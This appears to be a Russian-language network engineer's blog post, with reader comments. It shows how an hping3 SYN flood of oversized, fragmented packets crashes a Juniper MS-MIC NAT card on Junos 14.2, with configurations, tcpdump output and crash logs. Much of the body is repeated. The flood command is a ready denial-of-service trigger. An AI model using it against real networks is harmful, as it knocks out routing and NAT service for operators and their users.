В статье приведен пример генерации трафика прохождение которого через MS-MIC приводит к его краху.
Описание карт MS-MIC и его функций - Описание мультисервисных карт
Имеем:
Model: mx80-48t
Junos: 14.2R6.5
MS-MIC-16G
CPE Windows 10
NetScanTools (для генерации трафика)
CPE Centos
hping version 3.0.0-alpha-1 (для генерации трафика)
При тестировании на 15.1R4.6 проблема не проявлялась.
Конфигурация пула, правил и сервисов для NAT трансляции:
set services service-set NAT-SERVICE-SET nat-rules NAT-RULE
set services service-set NAT-SERVICE-SET next-hop-service inside-service-interface ms-0/2/0.100
set services service-set NAT-SERVICE-SET next-hop-service outside-service-interface ms-0/2/0.200
set services nat pool NAT-POOL-1 address 109.108.88.152/32
set services nat pool NAT-POOL-1 address 109.108.88.155/32
set services nat pool NAT-POOL-1 port automatic random-allocation
set services nat pool NAT-POOL-1 address-allocation round-robin
set services nat pool NAT-POOL-1 mapping-timeout 120
set services nat pool NAT-POOL-1 snmp-trap-thresholds address-port low 50
set services nat pool NAT-POOL-1 snmp-trap-thresholds address-port high 90
set services nat rule NAT-RULE match-direction input
set services nat rule NAT-RULE term t1 from source-prefix-list NAT-PREFIX-LIST
set services nat rule NAT-RULE term t1 then translated source-pool NAT-POOL-1
set services nat rule NAT-RULE term t1 then translated translation-type napt-44
set services nat rule NAT-RULE term t1 then translated address-pooling paired
Настройка сервисного интерфейса:
set interfaces ms-0/2/0 traceoptions
set interfaces ms-0/2/0 mtu 1518
set interfaces ms-0/2/0 services-options open-timeout 10
set interfaces ms-0/2/0 services-options close-timeout 20
set interfaces ms-0/2/0 services-options inactivity-tcp-timeout 25
set interfaces ms-0/2/0 services-options fragment-limit 10
set interfaces ms-0/2/0 services-options session-limit maximum 250k
set interfaces ms-0/2/0 services-options session-limit rate 100k
set interfaces ms-0/2/0 unit 100 family inet filter input NAT-VALID
set interfaces ms-0/2/0 unit 100 family inet filter output NAT-VALID
set interfaces ms-0/2/0 unit 100 service-domain inside
set interfaces ms-0/2/0 unit 200 family inet
set interfaces ms-0/2/0 unit 200 service-domain outside
Настройка RI для перенпаврления трафика через сервисную карту:
set routing-instances NAT-RI instance-type virtual-router
set routing-instances NAT-RI interface ms-0/2/0.100
set routing-instances NAT-RI routing-options static route 0.0.0.0/0 next-hop ms-0/2/0.100
set routing-instances NAT-RI routing-options static route 192.168.101.0/24 next-table inet.0
root@gw1.tvnet.if.ua> show services sessions count
Interface Service set Sessions count
ms-0/2/0 NAT-SERVICE-SET 80118
root@gw1.tvnet.if.ua> show services service-sets summary
Service sets CPU
Interface configured Bytes used Policy bytes used utilization
ms-0/2/0 2 1509678767 (13.07%) 3028768 ( 0.28%) 5.91 %
Попытка положить MS-MIC 1 (меняем размер пакета):
hping3 -d 2500 -S --destport 8081 -w 12000 --flood 77.66.55.4
tcpdump -i eth4 -vvv -c 500
15:54:44.911423 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.signet-ctf > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2134716389:2134717849, win 12000, length 1460
15:54:44.911438 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911465 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.ccs-software > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 613401041:613402501, win 12000, length 1460
15:54:44.911482 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911578 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.srp-feedback > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2132395273:2132396733, win 12000, length 1460
15:54:44.911594 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911612 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.ndl-tcp-ois-gw > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 1099711870:1099713330, win 12000, length 1460
15:54:44.911628 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911646 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.tn-timing > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 1527652475:1527653935, win 12000, length 1460
15:54:44.911662 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911680 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.alarm > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 20866699:20868159, win 12000, length 1460
Jun 30 17:21:36 gw1.tvnet.if.ua (FPC Slot 0, PIC Slot 2) ms02 kernel: svcs_ms2_app_sigcore_exit: sending UKERN_ST_DOWN (pid=188, td=0xc00000000344f960, sig=6)
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: peer_input_pending_internal:[4506] VKS0 for peer type 22 indx 2 reported a sb_state 32 = SBS_CANTRCVMORE
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: peer_inputs:4766 VKS0 closing connection peer type 22 indx 2 err 5
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: pfe_listener_disconnect: conn dropped: listener idx=1, tnpaddr=0x80000310, reason: generic peer error
Jun 30 17:21:36 gw1.tvnet.if.ua datapath-traced[1759]: datapath_traced_connection_event_handler: Disconnected from MSPMAND
Jun 30 17:21:36 gw1.tvnet.if.ua mspd[1752]: Removed PIC connection state for fpc=0 pic=2 session=0x1890100
Jun 30 17:21:36 gw1.tvnet.if.ua (FPC Slot 0, PIC Slot 2) ms02 mspsmd[176]: mspsmd_connection_shutdown: Unexpected shutdown of connection, try reconnecting.
Jun 30 17:21:37 gw1.tvnet.if.ua /kernel: if_pfe_services_health_status: Generating Health status (down) msg for ifd : ms-0/2/0
Jun 30 17:21:37 gw1.tvnet.if.ua /kernel: if_pfe_services_health_status: Skipped health status (down) AMS member mams-0/2/0 as not marked lb-member yet
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 610, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.100
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 628, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.200
root@gw1.tvnet.if.ua> show chassis fpc pic-status
Slot 0 Online
PIC 0 Online 4x 10GE XFP
PIC 2 Ready MS-MIC-16G
Slot 1 Online
PIC 0 Online 12x 1GE(LAN) RJ45
PIC 1 Online 12x 1GE(LAN) RJ45
PIC 2 Online 12x 1GE(LAN) RJ45
PIC 3 Online 12x 1GE(LAN) RJ45
Описание карт MS-MIC и его функций - Описание мультисервисных карт
Имеем:
Model: mx80-48t
Junos: 14.2R6.5
MS-MIC-16G
CPE Windows 10
NetScanTools (для генерации трафика)
CPE Centos
hping version 3.0.0-alpha-1 (для генерации трафика)
При тестировании на 15.1R4.6 проблема не проявлялась.
Конфигурация пула, правил и сервисов для NAT трансляции:
set services service-set NAT-SERVICE-SET nat-rules NAT-RULE
set services service-set NAT-SERVICE-SET next-hop-service inside-service-interface ms-0/2/0.100
set services service-set NAT-SERVICE-SET next-hop-service outside-service-interface ms-0/2/0.200
set services nat pool NAT-POOL-1 address 109.108.88.152/32
set services nat pool NAT-POOL-1 address 109.108.88.155/32
set services nat pool NAT-POOL-1 port automatic random-allocation
set services nat pool NAT-POOL-1 address-allocation round-robin
set services nat pool NAT-POOL-1 mapping-timeout 120
set services nat pool NAT-POOL-1 snmp-trap-thresholds address-port low 50
set services nat pool NAT-POOL-1 snmp-trap-thresholds address-port high 90
set services nat rule NAT-RULE match-direction input
set services nat rule NAT-RULE term t1 from source-prefix-list NAT-PREFIX-LIST
set services nat rule NAT-RULE term t1 then translated source-pool NAT-POOL-1
set services nat rule NAT-RULE term t1 then translated translation-type napt-44
set services nat rule NAT-RULE term t1 then translated address-pooling paired
Настройка сервисного интерфейса:
set interfaces ms-0/2/0 traceoptions
set interfaces ms-0/2/0 mtu 1518
set interfaces ms-0/2/0 services-options open-timeout 10
set interfaces ms-0/2/0 services-options close-timeout 20
set interfaces ms-0/2/0 services-options inactivity-tcp-timeout 25
set interfaces ms-0/2/0 services-options fragment-limit 10
set interfaces ms-0/2/0 services-options session-limit maximum 250k
set interfaces ms-0/2/0 services-options session-limit rate 100k
set interfaces ms-0/2/0 unit 100 family inet filter input NAT-VALID
set interfaces ms-0/2/0 unit 100 family inet filter output NAT-VALID
set interfaces ms-0/2/0 unit 100 service-domain inside
set interfaces ms-0/2/0 unit 200 family inet
set interfaces ms-0/2/0 unit 200 service-domain outside
Настройка RI для перенпаврления трафика через сервисную карту:
set routing-instances NAT-RI instance-type virtual-router
set routing-instances NAT-RI interface ms-0/2/0.100
set routing-instances NAT-RI routing-options static route 0.0.0.0/0 next-hop ms-0/2/0.100
set routing-instances NAT-RI routing-options static route 192.168.101.0/24 next-table inet.0
Тесты:
Обычная тестовая генерация трафика: hping3 -d 1400 -S --destport 8081 -w 12000 --flood 77.66.55.4 с 2-х хостов. При этом странички на CPE е открываются.root@gw1.tvnet.if.ua> show services sessions count
Interface Service set Sessions count
ms-0/2/0 NAT-SERVICE-SET 80118
root@gw1.tvnet.if.ua> show services service-sets summary
Service sets CPU
Interface configured Bytes used Policy bytes used utilization
ms-0/2/0 2 1509678767 (13.07%) 3028768 ( 0.28%) 5.91 %
Попытка положить MS-MIC 1 (меняем размер пакета):
hping3 -d 2500 -S --destport 8081 -w 12000 --flood 77.66.55.4
tcpdump -i eth4 -vvv -c 500
15:54:44.911423 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.signet-ctf > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2134716389:2134717849, win 12000, length 1460
15:54:44.911438 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911465 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.ccs-software > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 613401041:613402501, win 12000, length 1460
15:54:44.911482 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911578 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.srp-feedback > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2132395273:2132396733, win 12000, length 1460
15:54:44.911594 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911612 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.ndl-tcp-ois-gw > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 1099711870:1099713330, win 12000, length 1460
15:54:44.911628 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911646 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.tn-timing > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 1527652475:1527653935, win 12000, length 1460
15:54:44.911662 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911680 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.alarm > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 20866699:20868159, win 12000, length 1460
Jun 30 17:21:36 gw1.tvnet.if.ua (FPC Slot 0, PIC Slot 2) ms02 kernel: svcs_ms2_app_sigcore_exit: sending UKERN_ST_DOWN (pid=188, td=0xc00000000344f960, sig=6)
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: peer_input_pending_internal:[4506] VKS0 for peer type 22 indx 2 reported a sb_state 32 = SBS_CANTRCVMORE
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: peer_inputs:4766 VKS0 closing connection peer type 22 indx 2 err 5
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: pfe_listener_disconnect: conn dropped: listener idx=1, tnpaddr=0x80000310, reason: generic peer error
Jun 30 17:21:36 gw1.tvnet.if.ua datapath-traced[1759]: datapath_traced_connection_event_handler: Disconnected from MSPMAND
Jun 30 17:21:36 gw1.tvnet.if.ua mspd[1752]: Removed PIC connection state for fpc=0 pic=2 session=0x1890100
Jun 30 17:21:36 gw1.tvnet.if.ua (FPC Slot 0, PIC Slot 2) ms02 mspsmd[176]: mspsmd_connection_shutdown: Unexpected shutdown of connection, try reconnecting.
Jun 30 17:21:37 gw1.tvnet.if.ua /kernel: if_pfe_services_health_status: Generating Health status (down) msg for ifd : ms-0/2/0
Jun 30 17:21:37 gw1.tvnet.if.ua /kernel: if_pfe_services_health_status: Skipped health status (down) AMS member mams-0/2/0 as not marked lb-member yet
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 610, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.100
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 628, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.200
root@gw1.tvnet.if.ua> show chassis fpc pic-status
Slot 0 Online
PIC 0 Online 4x 10GE XFP
PIC 2 Ready MS-MIC-16G
Slot 1 Online
PIC 0 Online 12x 1GE(LAN) RJ45
PIC 1 Online 12x 1GE(LAN) RJ45
PIC 2 Online 12x 1GE(LAN) RJ45
PIC 3 Online 12x 1GE(LAN) RJ45
Возможно увидеть фаервол с reference NAT-VALID ?
ОтветитьУдалитьshow firewall filter NAT-VALID
ОтветитьУдалитьterm t10 {
from {
source-address {
192.168.101.0/24;
}
}
then {
routing-instance NAT-RI;
}
}
term t20 {
then accept;
}
такой?
Нет. Там просто указано, что с подсети НАТ - зен акцепт. Остальное дискард.
УдалитьЕсли не затруднит выложите конфиг касательно ната, хотелось бы разобратся как карта работает с роутинг-инстансом, у себя нат смогли запустить только через:
Удалитьservice-set ss2 {
nat-rules r1;
interface-service {
service-interface ms-0/2/0;
}
}
и никак не получается через next-hop
У меня отваливается карточка ms-0/2/0 если падает хотя бы один линк через который идет трафик для ната. Например
ОтветитьУдалитьNov 8 14:30:55 Core1 mib2d[1598]: SNMP_TRAP_LINK_DOWN: ifIndex 515, ifAdminStatus up(1), ifOperStatus down(2), ifName xe-0/0/3
Nov 8 14:31:06 Core1 tfeb0 Transient flow-control asserted by MAC on ms-0/2 for 1 seconds
Nov 8 14:31:07 Core1 tfeb0 Transient flow-control asserted by MAC on ms-0/2 for 2 seconds
Nov 8 14:31:08 Core1 tfeb0 Prolonged flow-control asserted by MAC on ms-0/2
service-set test_shaper {
nat-rules test_shaper;
next-hop-service {
inside-service-interface ms-0/2/0.70;
outside-service-interface ms-0/2/0.71;
}
}
routing-instances {
test_shaper {
instance-type virtual-router;
interface xe-0/0/3.3903;
interface ms-0/2/0.70;
routing-options {
static {
route 192.168.191.0/24 next-hop 10.100.100.2;
route 0.0.0.0/0 next-hop ms-0/2/0.70;
}
}
}
}
Александр, подскажите не испытывали ли вы проблем с этой НАТ картой, в плане дисконектов по скайп, ссш и других подключений через нат? И настраивали ли вы application'ы или все по дефолту?
ОтветитьУдалитьПроблема была с версией 13.3R9, прошились на 15.1R4 - проблем с НАТом нет.
УдалитьА как вы трафик загоняете на NAT-RI? Делаете фильтр на интерфейс?
ОтветитьУдалитьПо разному. Можно через фильтр на сабскрайбера, можно через фильтр на аплинк интерфейсе, можно через общий фильтр на forwarding options. В этом примере скорея всего фильтр вешался на сабскрайбер интерфейс.
Удалитьчто-то не хочет на интерфес вешатся NAT-SERVICE-SET
ОтветитьУдалитьfamily inet {
service {
input {
##
## Warning: this service set must be an interface service
##
service-set NAT-SERVICE-SET;
}
output {
service-set NAT-SERVICE-SET;
}
}
address 10.10.10.1/24
'NAT-SERVICE-SET'
this service set must be an interface service
error: configuration check-out failed: (statements constraint check failed)